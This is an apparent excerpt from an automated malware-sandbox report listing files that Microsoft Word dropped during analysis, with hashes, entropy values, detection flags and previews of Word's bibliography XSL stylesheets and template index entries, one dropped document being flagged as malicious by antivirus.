                        SHA-512:1C5AE2C794017A81A4232A2EF43725A0DA30F9672123940D85D34A4A77744D2D7ECA5FFE9A91E2FEDDBDBADE4EEAD6AB80E565C1F8FBB813C5A2BC25F7F0A359
                        Malicious:false
                        Reputation:moderate, very likely benign file
                        Process:C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
                        File Type:data
                        Category:dropped
                        Size (bytes):32768
                        Entropy (8bit):0.03543965254728935
                        Encrypted:false
                        SSDEEP:3:Gtl8/2omJokBtElYl8/2omJokBtE//llT89//Wlkl:GtG2JoKt/G2JoKtMJ89Xis
                        MD5:C44A4DA3AA70A5E2CB411F85BC6B9F7B
                        SHA1:191C6EA4E48461EB8FF12149E42664EBBC49E076
                        SHA-256:9AEDB55F7926314AE1BC8F39503E91B92CB7DB557B38E9C30963F9C51F95D620
                        SHA-512:0934A7B0B288F19D6D944F45D7CEC0C760877658D21F7B192D4F70F4E968E18B488D8ABE63D684D321AC18012B4C072B6448051F9F185AE4460EC424CE50B87E
                        Malicious:false
                        Process:C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
                        File Type:SQLite Write-Ahead Log, version 3007000
                        Category:dropped
                        Size (bytes):4152
                        Entropy (8bit):1.3822995166211012
                        Encrypted:false
                        SSDEEP:12:KcKxOacAqtZeY4syJttJxUSo0x9DdN1tDEX4vcImm5RyZkFv4sbf:KlxOajqt8VtbDBtDi4kZERDf
                        MD5:66ED66C9B9BC59B2C955DFAA0F06A9FE
                        SHA1:9A4073A3343B92CC2450412A924C25E89F5A77CC
                        SHA-256:ECBC7710B5187C6F40DBA570F8C5C27A668C1FA208B479951B85BB8D7875621B
                        SHA-512:60D8B54A03612FA7F6488AED0FFFB180CD608D28ACACCBC5B8018B8CEE36FCC5DB60BCFA4E034BB53F439D8937FFBEB0036415496DCED45639CFF124A2E5506E
                        Malicious:false
                        Process:C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
                        File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                        Category:dropped
                        Size (bytes):4964
                        Entropy (8bit):3.3635954598868976
                        Encrypted:false
                        SSDEEP:48:FUD3hNZtbmsdBg6qjpLkwOEG6kpnydHk7al:mTZtLBFq9gV+EM
                        MD5:511EF60E1F58994DE2F954FAECE5383F
                        SHA1:F0E2E52AD5B55758760EA475892EBF3C9085D333
                        SHA-256:5F9B76346C88E6AA464B68E994DD0F9EDD321C40B7937233C589EC8751F4FB97
                        SHA-512:22145223B60C2DDDFE8FE4F835F68B460DFAAAF85DFF4274A43389ED5BF23187FF5CD118ABE7FE4A893A381A6F82A4C00ACF38D8053326916D4FB0654A79DE36
                        Malicious:false
                        Process:C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
                        File Type:Composite Document File V2 Document, Cannot read section info
                        Category:dropped
                        Size (bytes):753664
                        Entropy (8bit):6.56720077670688
                        Encrypted:false
                        SSDEEP:12288:VC69N9C/hMHx8kzFfagPtKEp6E72y/N0hwOGt+gBd8x+6vLrD1ag:AKHaY8k5faaboEy6r8zz1
                        MD5:97E9A7C60BFF384A23E99F52C4F3905B
                        SHA1:30C329B3BDC84FED1F62F7C087512FE0C773322E
                        SHA-256:8C4621AC76E4C244A3D71603F8A26AD42802E7C9654734DB4672519C44F8AD52
                        SHA-512:B94F5F2C866DB0F4AF07BD9D6174919EF2089B5AB0B0021A7C3063BE6022258A5651C3718EB241769CB8A5EA0FD1B8118F493262A3A6DA0557CF1559B48BC12C
                        Malicious:true
                        Antivirus:
                        • Antivirus: Avira, Detection: 100%
                        Process:C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
                        File Type:data
                        Category:dropped
                        Size (bytes):1024
                        Entropy (8bit):0.05194905805374581
                        Encrypted:false
                        SSDEEP:3:1lvlxlln:vz
                        MD5:FB294ADA09B99EF2DEFEDC229C6C3EF7
                        SHA1:D15075354757A59DE6E057435511D956663955FB
                        SHA-256:8B2E62CCAF3758D056D38071A1C4E0F0C9402FEC9F951801E394020235F8C099
                        SHA-512:AF6EFE82BEB4C57C61A5F769AE95810A277A5A791F698FE3BCF957197804D91A3170B505D5CD353870121D2F4A99131C61A41E0779DB51821845DD046490D09E
                        Malicious:false
                        Process:C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
                        File Type:data
                        Category:dropped
                        Size (bytes):1024
                        Entropy (8bit):0.05390218305374581
                        Encrypted:false
                        SSDEEP:3:ol3lYdn:4Wn
                        MD5:5D4D94EE7E06BBB0AF9584119797B23A
                        SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                        SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                        SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                        Malicious:false
                        Process:C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
                        File Type:data
                        Category:dropped
                        Size (bytes):290
                        Entropy (8bit):3.5081874837369886
                        Encrypted:false
                        SSDEEP:6:fxnxUXCOzi8ME3QepmlJ0+3FbnKfZObdADryMluxHZypwwyv:fxnydONGHmD0wbnKYZAH/lMZqiv
                        MD5:8D9B02CC69FA40564E6C781A9CC9E626
                        SHA1:352469A1ABB8DA1DC550D7E27924E552B0D39204
                        SHA-256:1D4483830710EF4A2CC173C3514A9F4B0ACA6C44DB22729B7BE074D18C625BAE
                        SHA-512:8B7DB2AB339DD8085104855F847C48970C2DD32ADB0B8EEA134A64C5CC7DE772615F85D057F4357703B65166C8CF0C06F4F6FD3E60FFC80DA3DD34B16D5B1281
                        Malicious:false
                        Preview:[File] | OriginalName: gostname.xsl | Component: WordFiles | ReqVer: 14 | Executable: {WD} | StoreLocation: {My Templates} | Command: /f {FilePath}
                        Process:C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):255948
                        Entropy (8bit):5.103631650117028
                        Encrypted:false
                        SSDEEP:6144:gwprAm795vtfb8p4bgWPWEtTmtcRCDPThNPFQwB+26RxlsIBkAgRMBHcTCwsHe5a:kW
                        MD5:9888A214D362470A6189DEFF775BE139
                        SHA1:32B552EB3C73CD7D0D9D924C96B27A86753E0F97
                        SHA-256:C64ED5C2A323C00E84272AD3A701CAEBE1DCCEB67231978DE978042F09635FA7
                        SHA-512:8A75FC2713003FA40B9730D29C786C76A796F30E6ACE12064468DD2BB4BF97EF26AC43FFE1158AB1DB06FF715D2E6CDE8EF3E8B7C49AA1341603CE122F311073
                        Malicious:false
                        Preview:<?xml version="1.0" encoding="utf-8"?>............<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>..........<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select=
                        Process:C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
                        File Type:data
                        Category:dropped
                        Size (bytes):278
                        Entropy (8bit):3.5280239200222887
                        Encrypted:false
                        SSDEEP:6:fxnxUXQAl8ME3QepmlJ0+3FbnKfZObdADryMluxHZypwwyv:fxnyllNGHmD0wbnKYZAH/lMZqiv
                        MD5:877A8A960B2140E3A0A2752550959DB9
                        SHA1:FBEC17B332CBC42F2F16A1A08767623C7955DF48
                        SHA-256:FE07084A41CF7DB58B06D2C0D11BCACB603D6574261D1E7EBADCFF85F39AFB47
                        SHA-512:B8B660374EC6504B3B5FCC7DAC63AF30A0C9D24306C36B33B33B23186EC96AEFE958A3851FF3BC57FBA72A1334F633A19C0B8D253BB79AA5E5AFE4A247105889
                        Malicious:false
                        Preview:[File] | OriginalName: gb.xsl | Component: WordFiles | ReqVer: 14 | Executable: {WD} | StoreLocation: {My Templates} | Command: /f {FilePath}
                        Process:C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):268317
                        Entropy (8bit):5.05419861997223
                        Encrypted:false
                        SSDEEP:6144:JwprAJLR95vtfb8p4bgWPzDCvCmvQursq7vImej/yQzSS1apSiQhHDOruvoVeMUh:N9
                        MD5:51D32EE5BC7AB811041F799652D26E04
                        SHA1:412193006AA3EF19E0A57E16ACF86B830993024A
                        SHA-256:6230814BF5B2D554397580613E20681752240AB87FD354ECECF188C1EABE0E97
                        SHA-512:5FC5D889B0C8E5EF464B76F0C4C9E61BDA59B2D1205AC9417CC74D6E9F989FB73D78B4EB3044A1A1E1F2C00CE1CA1BD6D4D07EEADC4108C7B124867711C31810
                        Malicious:false
                        Preview:<?xml version="1.0" encoding="utf-8"?>..<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>..............<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$para
                        Process:C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
                        File Type:data
                        Category:dropped
                        Size (bytes):286
                        Entropy (8bit):3.538396048757031
                        Encrypted:false
                        SSDEEP:6:fxnxUXcel8ME3QepmlJ0+3FbnKfZObdADryMluxHZypwwyv:fxnyMelNGHmD0wbnKYZAH/lMZqiv
                        MD5:149948E41627BE5DC454558E12AF2DA4
                        SHA1:DB72388C037F0B638FCD007FAB46C916249720A8
                        SHA-256:1B981DC422A042CDDEBE2543C57ED3D468288C20D280FF9A9E2BB4CC8F4776ED
                        SHA-512:070B55B305DB48F7A8CD549A5AECF37DE9D6DCD780A5EC546B4BB2165AF4600FA2AF350DDDB48BECCAA3ED954AEE90F5C06C3183310B081F555389060FF4CB01
                        Malicious:false
                        Preview:[File] | OriginalName: sist02.xsl | Component: WordFiles | ReqVer: 14 | Executable: {WD} | StoreLocation: {My Templates} | Command: /f {FilePath}
                        Process:C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):250983
                        Entropy (8bit):5.057714239438731
                        Encrypted:false
                        SSDEEP:6144:JwprA6OS95vtfb8p4bgWPzkhUh9I5/oBRSifJeg/yQzvapSiQhHZeruvoXMUw3im:uP
                        MD5:F883B260A8D67082EA895C14BF56DD56
                        SHA1:7954565C1F243D46AD3B1E2F1BAF3281451FC14B
                        SHA-256:EF4835DB41A485B56C2EF0FF7094BC2350460573A686182BC45FD6613480E353
                        SHA-512:D95924A499F32D9B4D9A7D298502181F9E9048C21DBE0496FA3C3279B263D6F7D594B859111A99B1A53BD248EE69B867D7B1768C42E1E40934E0B990F0CE051E
                        Malicious:false
                        Preview:<?xml version="1.0" encoding="utf-8"?>..<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>..............<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$para
                        Process:C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
                        File Type:data
                        Category:dropped
                        Size (bytes):290
                        Entropy (8bit):3.5161159456784024
                        Encrypted:false
                        SSDEEP:6:fxnxUX+l8ME3QepmlJ0+3FbnKfZObdADryMluxHZypwwyv:fxnyulNGHmD0wbnKYZAH/lMZqiv
                        MD5:C15EB3F4306EBF75D1E7C3C9382DEECC
                        SHA1:A3F9684794FFD59151A80F97770D4A79F1D030A6
                        SHA-256:23C262DF3AEACB125E88C8FFB7DBF56FD23F66E0D476AFD842A68DDE69658C7F
                        SHA-512:ACDF7D69A815C42223FD6300179A991A379F7166EFAABEE41A3995FB2030CD41D8BCD46B566B56D1DFBAE8557AFA1D9FD55143900A506FA733DE9DA5D73389D6
                        Malicious:false
                        Preview:[File] | OriginalName: turabian.xsl | Component: WordFiles | ReqVer: 14 | Executable: {WD} | StoreLocation: {My Templates} | Command: /f {FilePath}
                        Process:C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):344303
                        Entropy (8bit):5.023195898304535
                        Encrypted:false
                        SSDEEP:6144:UwprANnsqvtfL/vF/bkWPRMMv7EOMBPitjASjTQQr7IwR0TnyDk1b78plJwf33iD:6
                        MD5:F079EC5E2CCB9CD4529673BCDFB90486
                        SHA1:FBA6696E6FA918F52997193168867DD3AEBE1AD6
                        SHA-256:3B651258F4D0EE1BFFC7FB189250DED1B920475D1682370D6685769E3A9346DB
                        SHA-512:4FFFA59863F94B3778F321DA16C43B92A3053E024BDD8C5317077EA1ECC7B09F67ECE3C377DB693F3432BF1E2D947EC5BF8E88E19157ED08632537D8437C87D6
                        Malicious:false
                        Preview:<?xml version="1.0" encoding="utf-8"?>......<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>............<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$pa
                        Process:C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
                        File Type:data
                        Category:dropped
                        Size (bytes):374
                        Entropy (8bit):3.5414485333689694
                        Encrypted:false
                        SSDEEP:6:fxnxUX8FaE3f8AWqlQqr++lcWimqnKOE3QepmlJ0+3FbnKfZObdADryMluxHZypo:fxnyj9AWI+acgq9GHmD0wbnKYZAH/lMf
                        MD5:2F7A8FE4E5046175500AFFA228F99576
                        SHA1:8A3DE74981D7917E6CE1198A3C8E35C7E2100F43
                        SHA-256:1495B4EC56B371148EA195D790562E5621FDBF163CDD8A5F3C119F8CA3BD2363
                        SHA-512:4B8FBB692D91D88B584E46C2F01BDE0C05DCD5D2FF073D83331586FB3D201EACD777D48DB3751E534E22115AA1C3C30392D0D642B3122F21EF10E3EE6EA3BE82
                        Malicious:false
                        Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .T.e.x.t. .S.i.d.e.b.a.r. .(.A.n.n.u.a.l. .R.e.p.o.r.t. .R.e.d. .a.n.d. .B.l.a.c.k. .d.e.s.i.g.n.)...d.o.c.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........
                        Process:C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
                        File Type:Microsoft Word 2007+
                        Category:dropped
                        Size (bytes):47296
                        Entropy (8bit):6.42327948041841
                        Encrypted:false
                        SSDEEP:768:ftjI1BT8N37szq00s7dB2wMVJGHR97/RDU5naXUsT:fJIPTfq0ndB2w1bpsE
                        MD5:5A53F55DD7DA8F10A8C0E711F548B335
                        SHA1:035E685927DA2FECB88DE9CAF0BECEC88BC118A7
                        SHA-256:66501B659614227584DA04B64F44309544355E3582F59DBCA3C9463F67B7E303
                        SHA-512:095BD5D1ACA2A0CA3430DE2F005E1D576AC9387E096D32D556E4348F02F4D658D0E22F2FC4AA5BF6C07437E6A6230D2ABF73BBD1A0344D73B864BC4813D60861
                        Malicious:false
                        Process:C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
                        File Type:data
                        Category:dropped
                        Size (bytes):332
                        Entropy (8bit):3.4871192480632223
                        Encrypted:false
                        SSDEEP:6:fxnxUXsdDUaw93Ti8ME3QepmlJ0+3FbnKfZObdADryMluxHZypwwyv:fxnyoRw9eNGHmD0wbnKYZAH/lMZqiv
                        MD5:333BA58FCE326DEA1E4A9DE67475AA95
                        SHA1:F51FAD5385DC08F7D3E11E1165A18F2E8A028C14
                        SHA-256:66142D15C7325B98B199AB6EE6F35B7409DE64EBD5C0AB50412D18CBE6894097
                        SHA-512:BFEE521A05B72515A8D4F7D13D8810846DC60F1E85C363FFEBD6CACD23AE8D2E664C563FC74700A4ED4E358F378508D25C46CB5BE1CF587E2E278EBC22BB2625
                        Malicious:false
                        Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .m.l.a.s.e.v.e.n.t.h.e.d.i.t.i.o.n.o.f.f.i.c.e.o.n.l.i.n.e...x.s.l.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........
                        Process:C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):254875
                        Entropy (8bit):5.003842588822783
                        Encrypted:false
                        SSDEEP:6144:MwprAnniNgtfbzbOWPuv7kOMBLitjAUjTQLrYHwR0TnyDkHqV3iPr1zHX5T6SSXj:a
                        MD5:377B3E355414466F3E3861BCE1844976
                        SHA1:0B639A3880ACA3FD90FA918197A669CC005E2BA4
                        SHA-256:4AC5B26C5E66E122DE80243EF621CA3E1142F643DD2AD61B75FF41CFEE3DFFAF
                        SHA-512:B050AD52A8161F96CBDC880DD1356186F381B57159F5010489B04528DB798DB955F0C530465AB3ECD5C653586508429D98336D6EB150436F1A53ABEE0697AEB9
                        Malicious:false
                        Preview:<?xml version="1.0" encoding="utf-8"?>......<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>.....<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>...</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />......<xsl:variable name="prop_EndChars">.....<xsl:call-template name="templ_prop_EndChars"/>....</xsl:variable>......<xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$parameters" />......
                        Process:C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
                        File Type:data
                        Category:dropped
                        Size (bytes):288
                        Entropy (8bit):3.523917709458511
                        Encrypted:false
                        SSDEEP:6:fxnxUXC1l8ME3QepmlJ0+3FbnKfZObdADryMluxHZypwwyv:fxnySvNGHmD0wbnKYZAH/lMZqiv
                        MD5:4A9A2E8DB82C90608C96008A5B6160EF
                        SHA1:A49110814D9546B142C132EBB5B9D8A1EC23E2E6
                        SHA-256:4FA948EEB075DFCB8DCA773A3F994560C69D275690953625731C4743CD5729F7
                        SHA-512:320B9CC860FFBDB0FD2DB7DA7B7B129EEFF3FFB2E4E4820C3FBBFEA64735EB8CFE1F4BB5980302770C0F77FF575825F2D9A8BB59FC80AD4C198789B3D581963B
                        Malicious:false
                        Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .c.h.i.c.a.g.o...x.s.l.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........
                        Process:C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):296658
                        Entropy (8bit):5.000002997029767
                        Encrypted:false
                        SSDEEP:6144:RwprAMk0qvtfL/vF/bkWPz9yv7EOMBPitjASjTQQr7IwR0TnyDkJb78plJwf33iV:M
                        MD5:9AC6DE7B629A4A802A41F93DB2C49747
                        SHA1:3D6E929AA1330C869D83F2BF8EBEBACD197FB367
                        SHA-256:52984BC716569120D57C8E6A360376E9934F00CF31447F5892514DDCCF546293
                        SHA-512:5736F14569E0341AFB5576C94B0A7F87E42499CEC5927AAC83BB5A1F77B279C00AEA86B5F341E4215076D800F085D831F34E4425AD9CFD52C7AE4282864B1E73
                        Malicious:false
                        Preview:<?xml version="1.0" encoding="utf-8"?>....<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>............<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$para
                        Process:C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
                        File Type:data
                        Category:dropped
                        Size (bytes):302
                        Entropy (8bit):3.537169234443227
                        Encrypted:false
                        SSDEEP:6:fxnxUXfQIUA/e/Wl8ME3QepmlJ0+3FbnKfZObdADryMluxHZypwwyv:fxnyXZ/eulNGHmD0wbnKYZAH/lMZqiv
                        MD5:9C00979164E78E3B890E56BE2DF00666
                        SHA1:1FA3C439D214C34168ADF0FBA5184477084A0E51
                        SHA-256:21CCB63A82F1E6ACD6BAB6875ABBB37001721675455C746B17529EE793382C7B
                        SHA-512:54AC8732C2744B60DA744E54D74A2664658E4257A136ABE886FF21585E8322E028D8243579D131EF4E9A0ABDDA70B4540A051C8B8B60D65C3EC0888FD691B9A7
                        Malicious:false
                        Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .i.s.o.6.9.0.n.m.e.r.i.c.a.l...x.s.l.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........
                        Process:C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):217137
                        Entropy (8bit):5.068335381017074
                        Encrypted:false
                        SSDEEP:6144:AwprA3Z95vtf58pb1WP2DCvCmvQursq7vIme5QyQzSS1apSiQhHDlruvoVeMUwFj:4P
                        MD5:3BF8591E1D808BCCAD8EE2B822CC156B
                        SHA1:9CC1E5EFD715BD0EAE5AF983FB349BAC7A6D7BA0
                        SHA-256:7194396E5C833E6C8710A2E5D114E8E24338C64EC9818D51A929D57A5E4A76C8
                        SHA-512:D434A4C15DA3711A5DAAF5F7D0A5E324B4D94A04B3787CA35456BFE423EAC9D11532BB742CDE6E23C16FA9FD203D3636BD198B41C7A51E7D3562D5306D74F757
                        Malicious:false
                        Preview:<?xml version="1.0" encoding="utf-8"?>..<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>..........<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>...... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$parame
                        Process:C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
                        File Type:data
                        Category:dropped
                        Size (bytes):286
                        Entropy (8bit):3.5502940710609354
                        Encrypted:false
                        SSDEEP:6:fxnxUXfQICl8ME3QepmlJ0+3FbnKfZObdADryMluxHZypwwyv:fxnyXClNGHmD0wbnKYZAH/lMZqiv
                        MD5:9B8D7EFE8A69E41CDC2439C38FE59FAF
                        SHA1:034D46BEC5E38E20E56DD905E2CA2F25AF947ED1
                        SHA-256:70042F1285C3CD91DDE8D4A424A5948AE8F1551495D8AF4612D59709BEF69DF2
                        SHA-512:E50BB0C68A33D35F04C75F05AD4598834FEC7279140B1BB0847FF39D749591B8F2A0C94DA4897AAF6C33C50C1D583A836B0376015851910A77604F8396C7EF3C
                        Malicious:false
                        Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .i.s.o.6.9.0...x.s.l.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........
                        Process:C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):270198
                        Entropy (8bit):5.073814698282113
                        Encrypted:false
                        SSDEEP:6144:JwprAiaR95vtfb8pDbgWPzDCvCmvQursq7vImej/yQ4SS1apSiQhHDOruvoVeMUX:We
                        MD5:FF0E07EFF1333CDF9FC2523D323DD654
                        SHA1:77A1AE0DD8DBC3FEE65DD6266F31E2A564D088A4
                        SHA-256:3F925E0CC1542F09DE1F99060899EAFB0042BB9682507C907173C392115A44B5
                        SHA-512:B4615F995FAB87661C2DBE46625AA982215D7BDE27CAFAE221DCA76087FE76DA4B4A381943436FCAC1577CB3D260D0050B32B7B93E3EB07912494429F126BB3D
                        Malicious:false
